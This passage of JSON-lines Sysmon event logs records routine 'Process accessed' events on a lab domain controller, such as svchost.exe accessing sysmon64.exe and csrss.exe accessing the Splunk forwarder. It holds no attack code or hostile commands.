Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2996,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.170\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF0-5F25-0000-00107B3F0500}\r\nTargetProcessId: 2764\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.170","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF0-5F25-0000-00107B3F0500}","TargetProcessId":"2764","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2997,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.170\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.170","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2998,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.170\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.170","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2999,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.170\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.170","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3000,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.170\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.170","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3001,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.170\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.170","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3002,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.170\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.170","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3003,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.170\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.170","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3004,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.170\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 